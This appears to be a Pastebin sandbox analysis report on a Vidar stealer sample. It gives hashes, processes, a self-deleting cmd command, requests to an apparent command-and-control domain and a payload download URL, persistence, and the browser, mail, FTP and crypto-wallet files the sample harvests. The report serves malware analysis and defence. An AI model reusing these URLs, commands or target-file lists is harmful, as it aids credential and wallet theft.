API tools faq
paste
Advertisement
paladin316

Exes_8874219db6846885b78323d8de8249d1_exe_2019-08-16_00_30.txt

paladin316
Aug 15th, 2019
1,630
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 43.61 KB | None | 0 0
raw download clone embed print report
  1.  
  2. * MalFamily: "Vidar"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_8874219db6846885b78323d8de8249d1.exe"
  7. * File Size: 678912
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "d55e8d9f5498fdabc85c3e55b0abf07a10ad31c2e4af79dc7f21e44d4da9a0e0"
  10. * MD5: "8874219db6846885b78323d8de8249d1"
  11. * SHA1: "e9876fe687fd6386ee935a29ec8b691f05ffa51c"
  12. * SHA512: "554870cb99e843664f35d2cc1a1be951224c9b7d0bb695ddaf7dcfd6fd7456922a4905609c4c6548b2fcd7eeee27c1c0fe2e9923ba38639051cb7d9d792918e6"
  13. * CRC32: "24A82439"
  14. * SSDEEP: "12288:S11mCcWR7KYBfZgCedwlQ2aRusyKCqQgx0Ipmk/OkbavES2by:c1oW5nfZgChe1RPyBqaIpmkmkOvEjy"
  15.  
  16. * Process Execution:
  17. "Exes_8874219db6846885b78323d8de8249d1.exe",
  18. "Exes_8874219db6846885b78323d8de8249d1.exe",
  19. "8NRP3XENDA.exe",
  20. "cmd.exe",
  21. "taskkill.exe",
  22. "services.exe",
  23. "lsass.exe",
  24. "svchost.exe",
  25. "svchost.exe",
  26. "WmiPrvSE.exe",
  27. "svchost.exe",
  28. "taskhost.exe"
  29.  
  30.  
  31. * Executed Commands:
  32. "\"C:\\Users\\user\\AppData\\Local\\Temp\\Exes_8874219db6846885b78323d8de8249d1.exe\"",
  33. "C:\\ProgramData\\8NRP3XENDA.exe ",
  34. "C:\\Windows\\System32\\cmd.exe /c taskkill /im Exes_8874219db6846885b78323d8de8249d1.exe /f & erase C:\\Users\\user\\AppData\\Local\\Temp\\Exes_8874219db6846885b78323d8de8249d1.exe & exit",
  35. "C:\\Windows\\system32\\lsass.exe",
  36. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  37. "C:\\Users\\user\\AppData\\Roaming\\Intel Rapid\\IntelRapid.exe",
  38. "taskkill /im Exes_8874219db6846885b78323d8de8249d1.exe /f"
  39.  
  40.  
  41. * Signatures Detected:
  42.  
  43. "Description": "Creates RWX memory",
  44. "Details":
  45.  
  46.  
  47. "Description": "Possible date expiration check, exits too soon after checking local time",
  48. "Details":
  49.  
  50. "process": "8NRP3XENDA.exe, PID 1520"
  51.  
  52.  
  53.  
  54.  
  55. "Description": "A process attempted to delay the analysis task.",
  56. "Details":
  57.  
  58. "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
  59.  
  60.  
  61. "Process": "svchost.exe tried to sleep 360 seconds, actually delayed analysis time by 0 seconds"
  62.  
  63.  
  64.  
  65.  
  66. "Description": "Reads data out of its own binary image",
  67. "Details":
  68.  
  69. "self_read": "process: Exes_8874219db6846885b78323d8de8249d1.exe, pid: 2988, offset: 0x00000000, length: 0x000a5c00"
  70.  
  71.  
  72.  
  73.  
  74. "Description": "A process created a hidden window",
  75. "Details":
  76.  
  77. "Process": "Exes_8874219db6846885b78323d8de8249d1.exe -> C:\\ProgramData\\8NRP3XENDA.exe"
  78.  
  79.  
  80. "Process": "Exes_8874219db6846885b78323d8de8249d1.exe -> C:\\Windows\\System32\\cmd.exe"
  81.  
  82.  
  83.  
  84.  
  85. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  86. "Details":
  87.  
  88. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  89.  
  90.  
  91. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  92.  
  93.  
  94. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  95.  
  96.  
  97. "suspicious_request": "http://earphorialofts.net/72"
  98.  
  99.  
  100. "suspicious_request": "http://earphorialofts.net/freebl3.dll"
  101.  
  102.  
  103. "suspicious_request": "http://earphorialofts.net/mozglue.dll"
  104.  
  105.  
  106. "suspicious_request": "http://earphorialofts.net/msvcp140.dll"
  107.  
  108.  
  109. "suspicious_request": "http://earphorialofts.net/nss3.dll"
  110.  
  111.  
  112. "suspicious_request": "http://earphorialofts.net/softokn3.dll"
  113.  
  114.  
  115. "suspicious_request": "http://earphorialofts.net/vcruntime140.dll"
  116.  
  117.  
  118. "suspicious_request": "http://ip-api.com/line/"
  119.  
  120.  
  121. "suspicious_request": "http://earphorialofts.net/"
  122.  
  123.  
  124. "suspicious_request": "http://neecopower.com/wp-content/uploads/2019/08/client_only_64.exe"
  125.  
  126.  
  127.  
  128.  
  129. "Description": "Performs some HTTP requests",
  130. "Details":
  131.  
  132. "url": "http://earphorialofts.net/72"
  133.  
  134.  
  135. "url": "http://earphorialofts.net/freebl3.dll"
  136.  
  137.  
  138. "url": "http://earphorialofts.net/mozglue.dll"
  139.  
  140.  
  141. "url": "http://earphorialofts.net/msvcp140.dll"
  142.  
  143.  
  144. "url": "http://earphorialofts.net/nss3.dll"
  145.  
  146.  
  147. "url": "http://earphorialofts.net/softokn3.dll"
  148.  
  149.  
  150. "url": "http://earphorialofts.net/vcruntime140.dll"
  151.  
  152.  
  153. "url": "http://ip-api.com/line/"
  154.  
  155.  
  156. "url": "http://earphorialofts.net/"
  157.  
  158.  
  159. "url": "http://neecopower.com/wp-content/uploads/2019/08/client_only_64.exe"
  160.  
  161.  
  162.  
  163.  
  164. "Description": "Executed a process and injected code into it, probably while unpacking",
  165. "Details":
  166.  
  167. "Injection": "Exes_8874219db6846885b78323d8de8249d1.exe(2988) -> Exes_8874219db6846885b78323d8de8249d1.exe(292)"
  168.  
  169.  
  170.  
  171.  
  172. "Description": "Deletes its original binary from disk",
  173. "Details":
  174.  
  175.  
  176. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  177. "Details":
  178.  
  179. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 12773890 times"
  180.  
  181.  
  182.  
  183.  
  184. "Description": "Steals private information from local Internet browsers",
  185. "Details":
  186.  
  187. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  188.  
  189.  
  190. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  191.  
  192.  
  193. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\IE_Cookies.txt"
  194.  
  195.  
  196. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Edge_Cookies.txt"
  197.  
  198.  
  199. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Google Chrome_Default.txt"
  200.  
  201.  
  202. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  203.  
  204.  
  205. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  206.  
  207.  
  208.  
  209.  
  210. "Description": "Installs itself for autorun at Windows startup",
  211. "Details":
  212.  
  213. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IntelRapid.lnk"
  214.  
  215.  
  216.  
  217.  
  218. "Description": "Collects information about installed applications",
  219. "Details":
  220.  
  221. "Program": "Google Update Helper"
  222.  
  223.  
  224. "Program": "Microsoft Excel MUI 2013"
  225.  
  226.  
  227. "Program": "Microsoft Outlook MUI 2013"
  228.  
  229.  
  230.  
  231.  
  232. "Program": "Google Chrome"
  233.  
  234.  
  235. "Program": "Adobe Flash Player 29 NPAPI"
  236.  
  237.  
  238. "Program": "Adobe Flash Player 29 ActiveX"
  239.  
  240.  
  241. "Program": "Microsoft DCF MUI 2013"
  242.  
  243.  
  244. "Program": "Microsoft Access MUI 2013"
  245.  
  246.  
  247. "Program": "Microsoft Office Proofing Tools 2013 - English"
  248.  
  249.  
  250. "Program": "Adobe Acrobat Reader DC"
  251.  
  252.  
  253. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xef\\xbf\\xb1ol"
  254.  
  255.  
  256. "Program": "Microsoft Publisher MUI 2013"
  257.  
  258.  
  259. "Program": "Outils de v\\xef\\xbf\\xa9rification linguistique 2013 de Microsoft Office\\xef\\xbe\\xa0- Fran\\xef\\xbf\\xa7ais"
  260.  
  261.  
  262. "Program": "Microsoft Office Shared MUI 2013"
  263.  
  264.  
  265. "Program": "Microsoft Office OSM MUI 2013"
  266.  
  267.  
  268. "Program": "Microsoft InfoPath MUI 2013"
  269.  
  270.  
  271. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  272.  
  273.  
  274. "Program": "Microsoft Word MUI 2013"
  275.  
  276.  
  277. "Program": "Microsoft Groove MUI 2013"
  278.  
  279.  
  280.  
  281.  
  282. "Program": "Microsoft Access Setup Metadata MUI 2013"
  283.  
  284.  
  285. "Program": "Microsoft Office OSM UX MUI 2013"
  286.  
  287.  
  288. "Program": "Java Auto Updater"
  289.  
  290.  
  291. "Program": "Microsoft PowerPoint MUI 2013"
  292.  
  293.  
  294. "Program": "Microsoft Office Professional Plus 2013"
  295.  
  296.  
  297. "Program": "Adobe Refresh Manager"
  298.  
  299.  
  300. "Program": "Microsoft Office Proofing 2013"
  301.  
  302.  
  303. "Program": "Microsoft Lync MUI 2013"
  304.  
  305.  
  306.  
  307.  
  308. "Program": "Microsoft OneNote MUI 2013"
  309.  
  310.  
  311.  
  312.  
  313. "Description": "File has been identified by 17 Antiviruses on VirusTotal as malicious",
  314. "Details":
  315.  
  316. "Cylance": "Unsafe"
  317.  
  318.  
  319. "Cybereason": "malicious.687fd6"
  320.  
  321.  
  322. "APEX": "Malicious"
  323.  
  324.  
  325. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  326.  
  327.  
  328. "Endgame": "malicious (high confidence)"
  329.  
  330.  
  331. "Invincea": "heuristic"
  332.  
  333.  
  334. "McAfee-GW-Edition": "BehavesLike.Win32.ICLoader.jc"
  335.  
  336.  
  337. "FireEye": "Generic.mg.8874219db6846885"
  338.  
  339.  
  340. "SentinelOne": "DFI - Suspicious PE"
  341.  
  342.  
  343. "Microsoft": "Trojan:Win32/Wacatac.B!ml"
  344.  
  345.  
  346. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  347.  
  348.  
  349. "Acronis": "suspicious"
  350.  
  351.  
  352. "Malwarebytes": "Spyware.PredatorTheThief"
  353.  
  354.  
  355. "Rising": "Trojan.Generic@ML.100 (RDML:EhtzkKCTrdnwa6OCMtjm6Q)"
  356.  
  357.  
  358. "Fortinet": "W32/Kryptik.GTYV!tr"
  359.  
  360.  
  361. "CrowdStrike": "win/malicious_confidence_90% (D)"
  362.  
  363.  
  364. "Qihoo-360": "HEUR/QVM02.0.38B1.Malware.Gen"
  365.  
  366.  
  367.  
  368.  
  369. "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
  370. "Details":
  371.  
  372.  
  373. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  374. "Details":
  375.  
  376. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\*.dat"
  377.  
  378.  
  379. "file": "C:\\Users\\user\\AppData\\Roaming\\Bitcoin\\??"
  380.  
  381.  
  382. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e"
  383.  
  384.  
  385. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Bitcoin\\*.*"
  386.  
  387.  
  388. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Electrum\\\n"
  389.  
  390.  
  391. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\default_wallet"
  392.  
  393.  
  394. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\\n"
  395.  
  396.  
  397. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Electrum\\*.*"
  398.  
  399.  
  400. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\"
  401.  
  402.  
  403. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Litecoin\\*.*"
  404.  
  405.  
  406. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Litecoin\\"
  407.  
  408.  
  409. "file": "C:\\Users\\user\\AppData\\Roaming\\Litecoin\\*.dat"
  410.  
  411.  
  412. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\NameCoin\\"
  413.  
  414.  
  415. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\"
  416.  
  417.  
  418. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\NameCoin\\*.*"
  419.  
  420.  
  421. "file": "C:\\Users\\user\\AppData\\Roaming\\Namecoin\\*.dat"
  422.  
  423.  
  424. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\*.dat"
  425.  
  426.  
  427. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\TerraCoin\\"
  428.  
  429.  
  430. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\TerraCoin\\*.*"
  431.  
  432.  
  433. "file": "C:\\Users\\user\\AppData\\Roaming\\Terracoin\\"
  434.  
  435.  
  436. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\PrimeCoin\\*.*"
  437.  
  438.  
  439. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\"
  440.  
  441.  
  442. "file": "C:\\Users\\user\\AppData\\Roaming\\Primecoin\\*.dat"
  443.  
  444.  
  445. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\PrimeCoin\\"
  446.  
  447.  
  448. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\*.dat"
  449.  
  450.  
  451. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FreiCoin\\*.*"
  452.  
  453.  
  454. "file": "C:\\Users\\user\\AppData\\Roaming\\Freicoin\\"
  455.  
  456.  
  457. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FreiCoin\\"
  458.  
  459.  
  460. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DevCoin\\"
  461.  
  462.  
  463. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\"
  464.  
  465.  
  466. "file": "C:\\Users\\user\\AppData\\Roaming\\devcoin\\*.dat"
  467.  
  468.  
  469. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DevCoin\\*.*"
  470.  
  471.  
  472. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\*.dat"
  473.  
  474.  
  475. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Franko\\*.*"
  476.  
  477.  
  478. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Franko\\"
  479.  
  480.  
  481. "file": "C:\\Users\\user\\AppData\\Roaming\\Franko\\"
  482.  
  483.  
  484. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\*.dat"
  485.  
  486.  
  487. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MegaCoin\\"
  488.  
  489.  
  490. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MegaCoin\\*.*"
  491.  
  492.  
  493. "file": "C:\\Users\\user\\AppData\\Roaming\\Megacoin\\"
  494.  
  495.  
  496. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\*.dat"
  497.  
  498.  
  499. "file": "C:\\Users\\user\\AppData\\Roaming\\Infinitecoin\\"
  500.  
  501.  
  502. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\InfiniteCoin\\"
  503.  
  504.  
  505. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\InfiniteCoin\\*.*"
  506.  
  507.  
  508. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IxCoin\\"
  509.  
  510.  
  511. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\"
  512.  
  513.  
  514. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IxCoin\\*.*"
  515.  
  516.  
  517. "file": "C:\\Users\\user\\AppData\\Roaming\\Ixcoin\\*.dat"
  518.  
  519.  
  520. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Anoncoin\\*.*"
  521.  
  522.  
  523. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\"
  524.  
  525.  
  526. "file": "C:\\Users\\user\\AppData\\Roaming\\Anoncoin\\*.dat"
  527.  
  528.  
  529. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Anoncoin\\"
  530.  
  531.  
  532. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\*.dat"
  533.  
  534.  
  535. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\BBQCoin\\"
  536.  
  537.  
  538. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\BBQCoin\\*.*"
  539.  
  540.  
  541. "file": "C:\\Users\\user\\AppData\\Roaming\\BBQCoin\\"
  542.  
  543.  
  544. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\*.dat"
  545.  
  546.  
  547. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DigitalCoin\\"
  548.  
  549.  
  550. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DigitalCoin\\*.*"
  551.  
  552.  
  553. "file": "C:\\Users\\user\\AppData\\Roaming\\digitalcoin\\"
  554.  
  555.  
  556. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\*.dat"
  557.  
  558.  
  559. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MinCoin\\"
  560.  
  561.  
  562. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MinCoin\\*.*"
  563.  
  564.  
  565. "file": "C:\\Users\\user\\AppData\\Roaming\\Mincoin\\"
  566.  
  567.  
  568. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\*.dat"
  569.  
  570.  
  571. "file": "C:\\Users\\user\\AppData\\Roaming\\GoldCoin (GLD)\\\n"
  572.  
  573.  
  574. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\*.dat"
  575.  
  576.  
  577. "file": "C:\\Users\\user\\AppData\\Roaming\\YACoin\\"
  578.  
  579.  
  580. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\YACoin\\"
  581.  
  582.  
  583. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\YACoin\\*.*"
  584.  
  585.  
  586. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\*.dat"
  587.  
  588.  
  589. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FlorinCoin\\*.*"
  590.  
  591.  
  592. "file": "C:\\Users\\user\\AppData\\Roaming\\Florincoin\\"
  593.  
  594.  
  595. "file": "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FlorinCoin\\"
  596.  
  597.  
  598.  
  599.  
  600. "Description": "Harvests credentials from local FTP client softwares",
  601. "Details":
  602.  
  603. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  604.  
  605.  
  606.  
  607.  
  608. "Description": "Harvests information related to installed instant messenger clients",
  609. "Details":
  610.  
  611. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  612.  
  613.  
  614.  
  615.  
  616. "Description": "Harvests information related to installed mail clients",
  617. "Details":
  618.  
  619. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000003"
  620.  
  621.  
  622. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000007"
  623.  
  624.  
  625. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000006"
  626.  
  627.  
  628. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000005"
  629.  
  630.  
  631. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000004"
  632.  
  633.  
  634. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000009"
  635.  
  636.  
  637. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000008"
  638.  
  639.  
  640.  
  641.  
  642. "Description": "Collects information to fingerprint the system",
  643. "Details":
  644.  
  645.  
  646. "Description": "Created network traffic indicative of malicious activity",
  647. "Details":
  648.  
  649. "signature": "ET TROJAN Vidar/Arkei Stealer Client Data Upload"
  650.  
  651.  
  652. "signature": "ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious"
  653.  
  654.  
  655.  
  656.  
  657.  
  658. * Started Service:
  659. "VaultSvc"
  660.  
  661.  
  662. * Mutexes:
  663. "00000000-0000-0000-0000-0000000000003d3783a0-703a-11de-8c7a-806e6f6e6963"
  664.  
  665.  
  666. * Modified Files:
  667. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\passwords.txt",
  668. "C:\\ProgramData\\freebl3.dll",
  669. "C:\\ProgramData\\mozglue.dll",
  670. "C:\\ProgramData\\msvcp140.dll",
  671. "C:\\ProgramData\\nss3.dll",
  672. "C:\\ProgramData\\softokn3.dll",
  673. "C:\\ProgramData\\vcruntime140.dll",
  674. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\ld",
  675. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\historych",
  676. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\History\\Google Chrome_Default.txt",
  677. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Downloads\\Google Chrome_Default.txt",
  678. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\c",
  679. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Google Chrome_Default.txt",
  680. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\wd",
  681. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Autofill\\Google Chrome_Default.txt",
  682. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\CC\\Google Chrome_Default.txt",
  683. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Soft\\Authy\\\\xe2\\x9a\\x80\\xcd\\x9d\\xe0\\xae\\x80\\xc7\\xae\\xeb\\x96\\x80\\xc8\\x95\\xc3\\x84\\xc7\\xae",
  684. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\IE_Cookies.txt",
  685. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Edge_Cookies.txt",
  686. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\cookie_list.txt",
  687. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\outlook.txt",
  688. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\information.txt",
  689. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files\\Files.zip",
  690. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files\\Files3.zip",
  691. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Bitcoin\\\\xe1\\x93\\x9d\\xe7\\x9b\\x9e",
  692. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Ethereum\\",
  693. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Electrum\\\n",
  694. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\ElectrumLTC\\\r",
  695. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Exodus\\\n",
  696. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Exodus\\",
  697. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\ElectronCash\\\r",
  698. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MultiDoge\\\n",
  699. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Zcash\\",
  700. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DashCore\\",
  701. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Litecoin\\",
  702. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Anoncoin\\",
  703. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\BBQCoin\\",
  704. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DevCoin\\",
  705. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DigitalCoin\\",
  706. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FlorinCoin\\",
  707. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Franko\\",
  708. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FreiCoin\\",
  709. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\GoldCoinGLD\\\n",
  710. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\InfiniteCoin\\",
  711. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IOCoin\\",
  712. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IxCoin\\",
  713. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MegaCoin\\",
  714. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MinCoin\\",
  715. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\NameCoin\\",
  716. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\PrimeCoin\\",
  717. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\TerraCoin\\",
  718. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\YACoin\\",
  719. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\JAXX\\\r",
  720. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\US_00000000-0000-0000-0000-0000000000006747247925.zip",
  721. "C:\\ProgramData\\8NRP3XENDA.exe",
  722. "C:\\ProgramData\\8NRP3XENDA.exe:Zone.Identifier",
  723. "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
